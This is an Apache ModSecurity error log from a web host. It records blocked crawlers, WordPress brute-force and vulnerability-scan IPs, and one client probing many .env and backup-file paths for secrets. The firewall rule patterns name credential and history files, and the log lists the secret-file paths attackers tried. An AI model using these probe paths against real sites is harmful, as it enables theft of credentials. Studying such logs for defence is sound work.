[Tue May 26 13:18:05.174738 2026] [security2:error] [pid 501489:tid 501732] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQNGkFNZ9cRlz80IjXHwAAAPI"]
[Tue May 26 13:18:06.187386 2026] [security2:error] [pid 501489:tid 501671] [client 43.173.177.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVQNWkFNZ9cRlz80IjXRAAAALg"]
[Tue May 26 13:18:07.677885 2026] [security2:error] [pid 501489:tid 501665] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQN2kFNZ9cRlz80IjXcgAAALI"]
[Tue May 26 13:18:09.636863 2026] [security2:error] [pid 501489:tid 501700] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQOWkFNZ9cRlz80IjXoQAAANU"]
[Tue May 26 13:18:12.275532 2026] [security2:error] [pid 501489:tid 501700] [client 113.189.106.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQO2kFNZ9cRlz80IjX4QAAANU"]
[Tue May 26 13:18:12.679482 2026] [security2:error] [pid 501489:tid 501655] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQPGkFNZ9cRlz80IjX8QAAAKg"]
[Tue May 26 13:18:12.939259 2026] [security2:error] [pid 501489:tid 501724] [client 185.191.171.19:33574] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/cheer/list/"] [unique_id "ahVQPGkFNZ9cRlz80IjYCQAAAOw"]
[Tue May 26 13:18:12.939368 2026] [security2:error] [pid 501489:tid 501724] [client 185.191.171.19:33574] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/cheer/list/"] [unique_id "ahVQPGkFNZ9cRlz80IjYCQAAAOw"]
[Tue May 26 13:18:15.420645 2026] [security2:error] [pid 501489:tid 501728] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQPmkFNZ9cRlz80IjYTAAAAO8"]
[Tue May 26 13:18:15.421234 2026] [security2:error] [pid 501489:tid 501629] [client 142.248.80.72:37952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/app/.env"] [unique_id "ahVQP2kFNZ9cRlz80IjYZAAAAI8"]
[Tue May 26 13:18:15.421365 2026] [security2:error] [pid 501489:tid 501674] [client 142.248.80.72:37968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/backend/.env"] [unique_id "ahVQP2kFNZ9cRlz80IjYcwAAALs"]
[Tue May 26 13:18:15.421397 2026] [security2:error] [pid 501489:tid 501664] [client 142.248.80.72:37930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env"] [unique_id "ahVQP2kFNZ9cRlz80IjYdAAAALE"]
[Tue May 26 13:18:15.422092 2026] [security2:error] [pid 501489:tid 501699] [client 142.248.80.72:37964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/api/.env"] [unique_id "ahVQP2kFNZ9cRlz80IjYcgAAANQ"]
[Tue May 26 13:18:15.554870 2026] [security2:error] [pid 501489:tid 501545] [remote 109.205.180.55:52184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVQP2kFNZ9cRlz80IjYWgAAtjc"]
[Tue May 26 13:18:16.486429 2026] [security2:error] [pid 501489:tid 501635] [client 23.95.117.253:61413] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahVQP2kFNZ9cRlz80IjYXgAAAJU"]
[Tue May 26 13:18:16.941931 2026] [security2:error] [pid 501489:tid 501745] [client 4.201.75.230:2316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/gelay.php"] [unique_id "ahVQQGkFNZ9cRlz80IjYpwAAAP4"]
[Tue May 26 13:18:17.060594 2026] [security2:error] [pid 501489:tid 501576] [remote 160.250.186.220:57798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVQQGkFNZ9cRlz80IjYpQAA0VY"]
[Tue May 26 13:18:17.627873 2026] [security2:error] [pid 501489:tid 501686] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQQWkFNZ9cRlz80IjYtgAAAMc"]
[Tue May 26 13:18:18.604507 2026] [security2:error] [pid 501489:tid 501629] [client 142.248.80.72:37952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.copy"] [unique_id "ahVQQmkFNZ9cRlz80IjY4wAAAI8"]
[Tue May 26 13:18:18.783678 2026] [security2:error] [pid 501489:tid 501725] [client 104.28.119.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVQQmkFNZ9cRlz80IjY4QAAAO0"]
[Tue May 26 13:18:19.340812 2026] [security2:error] [pid 501489:tid 501707] [client 142.248.80.72:38832] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.swp"] [unique_id "ahVQQ2kFNZ9cRlz80IjZCAAAANw"]
[Tue May 26 13:18:19.343901 2026] [security2:error] [pid 501489:tid 501628] [client 142.248.80.72:38842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.orig"] [unique_id "ahVQQ2kFNZ9cRlz80IjZDAAAAI4"]
[Tue May 26 13:18:19.345544 2026] [security2:error] [pid 501489:tid 501738] [client 142.248.80.72:38806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.backup"] [unique_id "ahVQQ2kFNZ9cRlz80IjZDgAAAPc"]
[Tue May 26 13:18:19.346028 2026] [security2:error] [pid 501489:tid 501682] [client 142.248.80.72:38828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production~"] [unique_id "ahVQQ2kFNZ9cRlz80IjZDQAAAMM"]
[Tue May 26 13:18:19.422483 2026] [security2:error] [pid 501489:tid 501676] [client 142.248.80.72:38782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.copy"] [unique_id "ahVQQ2kFNZ9cRlz80IjZEAAAAL0"]
[Tue May 26 13:18:19.422792 2026] [security2:error] [pid 501489:tid 501626] [client 142.248.80.72:38776] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.orig"] [unique_id "ahVQQ2kFNZ9cRlz80IjZEwAAAIw"]
[Tue May 26 13:18:19.423446 2026] [security2:error] [pid 501489:tid 501705] [client 142.248.80.72:38774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.swp"] [unique_id "ahVQQ2kFNZ9cRlz80IjZFAAAANo"]
[Tue May 26 13:18:19.423511 2026] [security2:error] [pid 501489:tid 501735] [client 142.248.80.72:38724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.copy"] [unique_id "ahVQQ2kFNZ9cRlz80IjZFwAAAPU"]
[Tue May 26 13:18:19.423536 2026] [security2:error] [pid 501489:tid 501742] [client 142.248.80.72:38756] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.backup"] [unique_id "ahVQQ2kFNZ9cRlz80IjZFgAAAPs"]
[Tue May 26 13:18:19.423589 2026] [security2:error] [pid 501489:tid 501711] [client 142.248.80.72:38754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.old"] [unique_id "ahVQQ2kFNZ9cRlz80IjZGAAAAOA"]
[Tue May 26 13:18:19.426420 2026] [security2:error] [pid 501489:tid 501621] [client 142.248.80.72:38802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.old"] [unique_id "ahVQQ2kFNZ9cRlz80IjZEgAAAIc"]
[Tue May 26 13:18:19.427368 2026] [security2:error] [pid 501489:tid 501655] [client 142.248.80.72:38768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local~"] [unique_id "ahVQQ2kFNZ9cRlz80IjZHwAAAKg"]
[Tue May 26 13:18:19.427439 2026] [security2:error] [pid 501489:tid 501652] [client 142.248.80.72:38666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.backup"] [unique_id "ahVQQ2kFNZ9cRlz80IjZHAAAAKU"]
[Tue May 26 13:18:19.427709 2026] [security2:error] [pid 501489:tid 501660] [client 142.248.80.72:38796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.bak"] [unique_id "ahVQQ2kFNZ9cRlz80IjZHQAAAK0"]
[Tue May 26 13:18:19.427711 2026] [security2:error] [pid 501489:tid 501639] [client 142.248.80.72:38654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.bak"] [unique_id "ahVQQ2kFNZ9cRlz80IjZHgAAAJk"]
[Tue May 26 13:18:19.428208 2026] [security2:error] [pid 501489:tid 501702] [client 142.248.80.72:38716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.orig"] [unique_id "ahVQQ2kFNZ9cRlz80IjZGQAAANc"]
[Tue May 26 13:18:19.428512 2026] [security2:error] [pid 501489:tid 501643] [client 142.248.80.72:38698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env~"] [unique_id "ahVQQ2kFNZ9cRlz80IjZGwAAAJ0"]
[Tue May 26 13:18:19.429164 2026] [security2:error] [pid 501489:tid 501744] [client 142.248.80.72:38638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.old"] [unique_id "ahVQQ2kFNZ9cRlz80IjZIAAAAP0"]
[Tue May 26 13:18:19.429271 2026] [security2:error] [pid 501489:tid 501748] [client 142.248.80.72:38700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.swp"] [unique_id "ahVQQ2kFNZ9cRlz80IjZGgAAAQE"]
[Tue May 26 13:18:19.431040 2026] [security2:error] [pid 501489:tid 501688] [client 142.248.80.72:38740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.bak"] [unique_id "ahVQQ2kFNZ9cRlz80IjZIQAAAMk"]
[Tue May 26 13:18:19.642045 2026] [security2:error] [pid 501489:tid 501662] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQQ2kFNZ9cRlz80IjY_gAAAK8"]
[Tue May 26 13:18:20.081616 2026] [security2:error] [pid 501489:tid 501631] [client 4.201.75.230:2319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/god4m.php"] [unique_id "ahVQRGkFNZ9cRlz80IjZNAAAAJE"]
[Tue May 26 13:18:22.511988 2026] [security2:error] [pid 501489:tid 501692] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQRmkFNZ9cRlz80IjZdAAAAM0"]
[Tue May 26 13:18:24.844067 2026] [security2:error] [pid 501489:tid 501711] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQSGkFNZ9cRlz80IjZwwAAAOA"]
[Tue May 26 13:18:26.886386 2026] [security2:error] [pid 501489:tid 501643] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQSmkFNZ9cRlz80IjZ-AAAAJ0"]
[Tue May 26 13:18:27.710435 2026] [security2:error] [pid 501489:tid 501683] [client 4.201.75.230:2325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/mari.php"] [unique_id "ahVQS2kFNZ9cRlz80IjaIAAAAMQ"]
[Tue May 26 13:18:28.781957 2026] [security2:error] [pid 501489:tid 501732] [client 4.201.75.230:2308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/moon.php"] [unique_id "ahVQTGkFNZ9cRlz80IjaPAAAAPI"]
[Tue May 26 13:18:29.317278 2026] [security2:error] [pid 501489:tid 501745] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQTGkFNZ9cRlz80IjaPwAAAP4"]
[Tue May 26 13:18:31.678659 2026] [security2:error] [pid 501489:tid 501658] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQT2kFNZ9cRlz80IjahwAAAKs"]
[Tue May 26 13:18:31.753474 2026] [security2:error] [pid 501489:tid 501589] [remote 193.42.61.12:36148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVQT2kFNZ9cRlz80IjakgAAlWM"]
[Tue May 26 13:18:32.680873 2026] [security2:error] [pid 501489:tid 501710] [client 4.201.75.230:2305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/o.php"] [unique_id "ahVQUGkFNZ9cRlz80IjatQAAAN8"]
[Tue May 26 13:18:32.839240 2026] [security2:error] [pid 501489:tid 501690] [client 114.119.138.207:51797] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVQUGkFNZ9cRlz80IjavAAAAMs"], referer: http://coles-directory.com/computers_and_internet/entertainment/science_and_technology/recreation_and_sports/shopping/entertainment/reference/chats_and_forums/entertainment/magic/
[Tue May 26 13:18:34.916826 2026] [security2:error] [pid 501489:tid 501695] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQUmkFNZ9cRlz80Ija8AAAANA"]
[Tue May 26 13:18:36.863054 2026] [security2:error] [pid 501489:tid 501729] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQVGkFNZ9cRlz80IjbLQAAAPA"]
[Tue May 26 13:18:38.083043 2026] [security2:error] [pid 501489:tid 501657] [client 103.191.196.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQVWkFNZ9cRlz80IjbTgAAAKo"]
